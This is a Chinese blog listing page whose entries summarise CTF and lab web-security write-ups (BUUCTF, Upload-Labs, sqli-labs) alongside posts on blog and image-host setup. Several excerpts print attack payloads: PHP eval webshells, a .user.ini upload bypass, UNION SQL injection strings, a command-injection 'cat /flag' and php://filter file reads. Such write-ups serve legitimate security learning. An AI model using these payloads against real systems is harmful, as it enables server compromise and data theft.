- 博客(34)
- 资源 (1)
- 收藏
- 关注
RSS订阅
原创 BUUCTF寒假刷题-Web
寒假横向刷题(尽量)BUUCTF2021.01.15[HCTF 2018]WarmUp进到靶机一个硕大的滑稽,查看源码有提示source.php<?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","h.
2021-02-28 20:45:28
66189
原创 [SWPU2019]Web1
一个登陆界面,再看下url地址为login.php,确认了使用的是php直接查看源码,在源码中找到了register.php。先注册一个进去看一看。是一个发布广告的信息页,发布广告时需要输入广告的标题和内容,联想一下之前做过的发布文章的,应该是sql注入,输入广告标题输入一个单引号'试一试广告详情中出现了数据库报错猜测应该是二次注入,发布时加上一些转义字符没有出现错误,但是查看详情时再次从数据库中取出带有payload的数据,可以执行sql语句。而且上面的单引号测试出来了是字符型单引号闭合。
2021-04-15 10:29:54
214
原创 [BJDCTF2020]Easy MD5
MD5参考:【Jarvis OJ】Login–password=’".md5($pass,true)."sql注入:md5($password,true)Leet More 2010 Oh Those Admins! writeup随便输入一些东西都没有反应,在请求头中发现了一个Hint:select * from ‘admin’ where password=md5($pass,true)语法md5(string,raw)参数描述string必需。要计算的
2021-03-06 14:56:42
220
原创 [SUCTF 2019]CheckIn
知识点.user.ini。它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。可谓很广,不像.htaccess有局限性,只能是apache.准备好.user.ini文件内容为自动包含图片马,因为上传会检查文件头,所以添加了一个GIF文件头伪装:GIF89aauto_prepend_file=233.gif接下来上传图片马,尝试了正常上传的一句话会提示:<? in contents!所以使用script马执.
2021-03-06 14:51:25
409
原创 [极客大挑战 2019]BuyFlag
网站题直接去看源码,在源码也搜索php有两个:index.php、pay.php。前者是首页,直接看后面的那个,打开就有提示Only Cuit’s students can buy the FLAG应该还是一道http的套娃题。查看网页的请求发现Cookie中有一个user=0,很可疑,改成user=1,有了下一个提示:输入密码,并且源码中有一段php<!-- ~~~post money and password~~~if (isset($_POST['password'])) { $
2021-03-06 14:47:56
171
原创 [HCTF 2018]admin
可以在注释里找到<!-- you are not admin -->思路应该是只要我们是admin登陆就可以得到flag,可以找到注册按钮,不能注册admin,那就随便注册一个进去看看。找到几个功能。post。发表文章,但是没能找到在哪里打开change password。改密码,尝试下能不能抓包改到admin的密码修改密码抓到的包:感觉并没有什么下手的地方,唯一的就是session可能和身份有关。以下的是看网上的wp在change password页面查看源码,发现.
2021-03-06 14:44:25
295
原创 [极客大挑战 2019]BabySQL
尝试万能密码,发现报错了:1=1#’ and password=‘123’,也许是or被过滤了或者删掉了,尝试大小写无果,但是尝试双写通过了。需要注意的是爆表,爆数据库的语句中有information这个词,其中的for也会被过滤。其他过滤的词我遇到的有:union,select、from、where、and。爆数据库(填密码):1' uniunionon selselectect 1,2,group_concat(table_name) frfromom infoorrmation_schema.t.
2021-03-04 11:07:07
95
1
原创 [极客大挑战 2019]Upload
先尝试上传一个gif图片马内容为GIF89a<?php@eval($_POST['a']);页面提示过滤:NO! HACKER! your file included ‘<?’尝试script执行php代码<script language="php">eval($_POST['cmd'])</script>可以上传,文件在/upload目录下。尝试修改后缀上传,phtml上传成功,可以执行php和script代码,使用蚁剑连接。...
2021-03-04 11:06:15
371
1
原创 [极客大挑战 2019]PHP
源码备份在www.zip中。下载以后有五个文件class.phpflag.phpindex.jsindex.phpstyle.css在index.php中有一段代码<?php include 'class.php'; $select = $_GET['select']; $res=unserialize(@$select); ?>再结合又一个class.php,所以这道题考点应该是反序列化。class.php<?phpinclu.
2021-03-04 11:05:18
111
1
原创 [极客大挑战 2019]Http
查看源码在"氛围"这两个字上有隐藏的跳转Secret.php。进入以后页面显示It doesn't come from 'https://www.Sycsecret.com'提示页面不是来自这个网址,所以在HackBar上加上Referer:https://www.Sycsecret.com。之后又提示Please use "Syclover" browser加上User-Agent:Syclover。又提示No!!! you can only read this locally!!!加.
2021-03-04 10:58:44
157
1
原创 [极客大挑战 2019]Knife & [RoarCTF 2019]Easy Calc
一句话直接连。一个计算器随便试一试,当输入字母时会报错。查看网页源码,在script中发现了运行计算器的php文件:calc.php,但是也有一句很重要的注释<!--I've set up WAF to ensure security.-->php的正则表达式中并没有过滤字母的条件,所以我们输入字母被过滤是因为WAF,接下来是参考网上的wp自己的理解可以在calc.php传参? num=aphp会输出一个值a,说明已经绕过了WAF。这里使用的是WAF和php解析方法不一样.
2021-03-04 10:55:37
93
1
原创 [BJDCTF2020]Cookie is so stable
这道题和The mystery of ip的网站一样,还有可能是ssti,hint.php的注释里有Why not take a closer look at cookies?去flag.php提交个1之后,看cookie为Cookie: PHPSESSID=dba9ac7cbddf1983cbac508b01f8cdf2; user=1一目了然,接下来就是找payload。再使用之前的{system('cat /flag')}被拦下来了,说明加强了过滤。在这之后去看了wp,网上的wp.
2021-03-04 09:21:22
125
3
原创 [护网杯 2018]easy_tornado
打开页面三个超链接/flag.txt/welcome.txthints.txt内容分别是flag in /fllllllllllllagrendermd5(cookie_secret+md5(filename))进入hints.txt注意到url地址此时为/file?filename=/hints.txt&filehash=2a84a09bc1d5e3d8745131754ff208fa再根据hints.txt文件的内容,推断可以使用url方式访问文件,但是需要提供fi
2021-03-03 09:34:43
96
原创 [GXYCTF2019]Ping Ping Ping
题目传送门[ACTF2020 新生赛]Exec肯定是尝试管道符127.0.0.1|cat /flag附:大佬整理的博客(内含更多姿势):命令执行漏洞利用及绕过方式总结
2021-03-03 09:33:08
92
原创 [极客大挑战 2019]LoveSQL
顶端の告诫:用 sqlmap 是没有灵魂的尝试万能密码(其实没卵用)'or 1=1 #任意密码这道题是常规的sql注入,测注入点、查字段数、爆库、爆字段值、爆表。组合拳字段数:1' order by 3 #爆库:1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() #geekuser,l0ve1ysq1爆字段值:1' u
2021-03-03 09:31:26
232
1
原创 [极客大挑战 2019]Secret File
查看源码,又一个背景是黑色的超链接跳转到 Archive_room.php。查看源码SECRET跳转的是action.php。但是跳转以后是url地址为end.php,所以中间跳过了一个页面,使用bp抓包查看。stristr()函数返回字符串中子串第一次出现位置之后的内容,简而言之还是过滤。同样使用php伪协议filter过滤器读取文件?file=php://filter/convert.base64-encode/resource=flag.phpPCFET0NUWVBFIGh0bW.
2021-03-03 09:30:34
135
原创 [ACTF2020 新生赛]Include
不截图了,进入靶机只有一个tips等着被点。跳转以后看url中参数?file=flag.php页面内容只有Can you find out the flag?立马想到使用php伪协议读文件内容。使用filter过滤器?file=php://filter/convert.base64-encode/resource=flag.php得到PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7OTAyNTIyNDgtM
2021-03-03 09:27:25
68
原创 [SUCTF 2019]EasySQL
单引号无报错,尝试堆叠注入可以回显。和 [强网杯 2019]随便注这道题一样查库查表查字段1;show databases;1;show tables;但是执行1;desc `Flag`;1;show columns from Flag;返回了"Nonono.“测试出被过滤了:desc、from、Flag。接下来的都是抄网上的预期解也是第一次见。比赛时源码泄露select $_GET['query'] || flag from flag在oracle 缺省支持 通过 ‘ ||.
2021-03-03 09:24:30
179
原创 [强网杯 2019]随便注
根据题目尝试sql注入,单引号报错,单引号加注释无报错,说明存在sql注入,当测试输入select时返回过滤的黑名单:return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);这道题使用的是堆叠注入,原理在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入).
2021-03-03 08:59:15
99
原创 [HCTF 2018]WarmUp
[HCTF 2018]WarmUp进到靶机一个硕大的滑稽,查看源码有提示source.php<?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
2021-03-03 08:56:55
70
原创 萌娘百科黑幕实现
前言本人博客引擎使用的是hexo,主题使用的是Butterfly。[这篇文章的效果展示],感谢作者主题(https://braindance.tk/2020/%E8%90%8C%E5%A8%98%E7%99%BE%E7%A7%91%E9%BB%91%E5%B9%95%E5%AE%9E%E7%8E%B0/) 老早就觉得萌娘百科里的黑幕很好玩,所以摸索着给自己博客加了一个。参考博客Re:萌娘百科上的黑幕实现。不过我改的方法有稍稍有点不同,是把hexo渲染markdown文章中的删除线~~ ~~标签修改了.
2021-03-01 08:58:19
1107
原创 PicGo复制自定义链接
前言现在博客里面的图片使用的是github+jsdelivr+PicGo图床。PicGo是一个开源的上传图片的软件,支持大部分图床的上传,只需要设置对应的图床参数即可一键上传。github上PicGo的概述:PicGo: 一个用于快速上传图片并获取图片 URL 链接的工具PicGo 本体支持如下图床:七牛图床 v1.0腾讯云 COS v4\v5 版本 v1.1 & v1.5.0又拍云 v1.2.0GitHub v1.5.0SM.MS V2 v2.3.0-beta.0阿里云 O.
2021-03-01 08:55:01
1072
原创 Let‘s Encrypt 免费Https证书
参考文章:Let’s Encrypt,免费好用的 HTTPS 证书先放官网Let’s EncryptLet’s Encrypt 是免费、自动化、开放的证书签发服务, 它得到了 Mozilla、Cisco、Akamai、Electronic Frontier Foundation 和 Chrome 等众多公司和机构的支持,发展十分迅猛所需环境一个 HTTP 服务,以 Nginx 为例python两个目录:/site 网站目录/site_site_cert 保存证书的目录.
2021-03-01 08:54:08
330
原创 jsdelivr 缓存刷新
前言 上一篇修改了黑幕,但是使用了jsdelivr加速的静态资源,所以照常更新下github上的资源,但是github上查看已经上传成功了,jsdelivr访问的依然是之前的资源,说白了就是缓存的问题。即使本地浏览器端的缓存已经清理,也会因为CDN周围的节点没有同步数据而导致用户端未能及时更新。缓存刷新把原来访问的链接https://cdn.jsdelivr.net/...改为https://purge.jsdelivr.net/...访问资源就会进行刷新,然后页面会返回刷新信息:划水.
2021-03-01 08:53:31
1334
1
原创 jsDelivr加速静态博客
前言 这几天总感觉博客访问特别慢,最先是找到了CDN加速,但是在国内加速的话域名都是要备案的,又看了看境外加速。CDN的全称是Content Delivery Network,即内容分发网络。CDN是构建在网络之上的内容分发网络,依靠部署在各地的边缘服务器,通过中心平台的负载均衡、内容分发、调度等功能模块,使用户就近获取所需内容,降低网络拥塞,提高用户访问响应速度和命中率。CDN的关键技术主要有内容存储和分发技术。——百度百科在犹豫要不要买的时候,发现了这个东西:jsdelivr,一个可以加速.
2021-03-01 08:52:52
378
原创 Chevereto-搭建一个自己的图床
博客搭完了,自己选择的这个博客主题又是以图片为主要元素的,当然要考虑图片的使用问题了,原来打算直接放在服务器上,但是后来想了想,以后如果文章越写越多用的图太多服务器的流量也不够用,想到了图床这一托管图片的服务,但是放在别人的上面总怕会受到限制,正好发现了Chevereto这一图床系统,可以自己搭建一个图床服务器,正好自己还有一个阿里云学生云,那就开工。Chevereto 说明Chevereto是一个可以帮助你建立自己的图像分享网站(图床)的应用程序,我们的目标是可以让世界上的任何一个人都可以建立.
2021-02-28 20:49:50
5026
2
原创 Upload-Labs(17-20)
Pass-17 (windows环境,php版本5.2.17,题号是18题)源码:$is_upload = false;$msg = null;if(isset($_POST['submit'])){ $ext_arr = array('jpg','png','gif'); $file_name = $_FILES['upload_file']['name']; $temp_file = $_FILES['upload_file']['tmp_name']; .
2021-02-28 20:26:47
253
4
原创 Upload-Labs(16)
前言 我在这道题上花了快一天的时间,但是也学到了不少姿势,觉得东西应该足够多,而且参考了的博客发现这道题算是有歧义的,不知道作者想要考察的点是哪一个,所以算是有两种解法吧,可惜的是两种方法都不算是大成功,只有部分成功执行了。 参考博客:upload-labs之pass 16详细分析Pass-16 源码(三种图片的判定,只贴一个吧,篇幅小一点):$is_upload = false;$msg = null;if (isset($_POST['submit'])){ // 获得上传.
2021-02-28 20:26:05
383
原创 Upload-Labs(11-15)
前言 继续接着上一次的Upload-labs往下写。这记下第11-15题,目前进度是20题都已经完成正在抽时间写博客,然后16题是我卡的最久的关,不过也学到了感觉很牛的姿势,所以到时候专门开一篇只讲16。 在线靶机地址:linux环境windows环境Pass-11 (这题使用了windows环境) 源码:$is_upload = false;$msg = null;if(isset($_POST['submit'])){ $ext_arr = array('jpg.
2021-02-28 20:25:24
213
原创 Upload-Labs(6-10)
前言 这次彻底的从头到尾分析了一下源码的执行过程,大致的写一下,以防以后再看的时候不知道题目是什么情况。$is_upload = false;$msg = null;if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PATH)) { //这里下面是过滤 $deny_ext = array(".php",".php5",".php4",".html", ......); $file_name .
2021-02-28 20:22:53
151
原创 Upload-Labs(1-5)
介绍大部分的网站和应用系统都有上传功能,而程序员在开发任意文件上传功能时,并未考虑文件格式后缀的合法性校验或者是否只在前端通过js进行后缀检验。这时攻击者可以上传一个与网站脚本语言相对应的恶意代码动态脚本,例如(jsp、asp、php、aspx文件后缀)到服务器上,从而访问这些恶意脚本中包含的恶意代码,进行动态解析最终达到执行恶意代码的效果,进一步影响服务器安全。在线靶机地址:linux环境windows环境Pass-01 尝试上传php木马,发现提示上传错误 提示只能上传jp.
2021-02-28 20:18:06
80
2
原创 sql-labs1
前言在线靶机地址:https://buuoj.cn/challenges#sqli-labsless-1 首先说明sql注入的大致步骤:判断注入类型。如整型字符型注入等。判断列数判断数据的回显位构造sql语句 根据题目提示,说明是一个单引号注入题目,构造一个带单引号的语句?id=1',发现数据库报错 通过后面的报错语句1'' LIMIT 0,1的分析,我们的单引号被数据库解析,那么说明我们也可以使用连接查询union插入我们想要查询的语句。 推出数据库的查询的部分语句可能.
2021-02-28 20:14:49
318
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人